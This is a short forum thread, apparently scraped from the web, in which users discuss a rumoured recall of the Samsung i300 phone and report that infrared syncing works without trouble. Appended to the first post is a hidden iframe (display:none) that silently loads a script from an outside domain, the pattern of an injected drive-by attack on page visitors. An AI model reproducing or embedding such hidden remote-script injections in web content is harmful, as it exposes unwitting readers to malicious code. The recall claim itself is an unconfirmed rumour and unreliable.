Exclamation I300 Recall?

Hey guys and gals, here is a quote form someone over at another hangout:

Quote:
I've heard from two sources that the Samsung i300 is being recalled due to problems with the phone or OS.

Source #1 - Sales rep from a Sprint Store in Manhattan

Source #2 - A friend of mine who works for Sprint in the Washington, DC area

Can anyone validate this rumor?

i think a call to samsung is in order...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I300 Recall

I haven't had any problems with mine. I would be surprised if there were a recall.

Sounds like just rumor someone has used as to why they are not avail in stores yet.

I have done a IR sync and have had no problems with the unit. Other than the sight problem with the "a" button, the unit is perfect!

I use the infared sync. I sync up with a Thinkpad via the IR. No problems. Phone on/off works fine afterwards. Sorry, wish I could be of more help... Maybe it is a bad app causing problems?
